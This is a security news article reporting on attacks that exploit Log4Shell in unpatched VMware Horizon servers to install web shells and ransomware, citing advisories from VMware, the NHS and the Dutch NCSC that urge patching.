Searching for Internet-exposed VMware Horizon servers with Shodan, we can find tens of thousands of installs potentially exposed to attacks.
In early January, threat actors started targeting VMware Horizon systems exposed on the Internet. VMware has addressed Log4Shell in Horizon with the release of 2111, 7.13.1, 7.10.3 versions, but unfortunately many unpatched systems are still exposed online.
Recently, Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.
“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.” reads the security advisory published by NHS.
“The attack likely consists of a reconnaissance phase, where the attacker uses theJava Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
Once installed a web shell, threat actors can use it to carry out a broad range of malicious activities, such as deploying data exfiltration or deployment of ransomware.
Upon exploiting log4J flaws, threat actors deploy custom web shells into the VM Blast Secure Gateway service to gain access to the networks of target organizations.
In an email to Bleeping Computer today, VMware said they are strongly urging customers to patch their Horizon servers to defend against these active attacks.
Multiple VMWare products, including VMware Horizon products, are impacted by remote code execution vulnerabilities via Apache Log4j (CVE-2021-44228, CVE-2021-45046).
Recently the Dutch National Cybersecurity Centre (NCSC) warned organizations to remain vigilant on possible attacks exploiting the Log4J vulnerability. According to the Dutch agency, threat actors the NCSC will continue to attempt to exploit the Log4Shell flaw in future attacks.
“Partly due to the rapid actions of many organizations, the extent of active abuse appears to be not too bad at the moment. But that doesn’t mean it stops there. It is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period. It is therefore important to remain vigilant.” states the Dutch NCSC agency. “The NCSC advises organizations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary. In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity.”
“In a zero-day situation such as the Apache Software Foundation Log4j vulnerability, cyber criminals are racing to exploit the vulnerabilities identified by CVE-2021-44228 and CVE-2021-45046 before organizations can address them. We continue to amplify the message in our security advisory, VMSA-2021-0028, urging customers to address the vulnerability immediately, including with VMware Horizon 8 and Horizon 7.x.” reads the guidance. “While most customers have followed the guidance, those who have not done so remain at risk.”
(SecurityAffairs – hacking, VMware Horizon)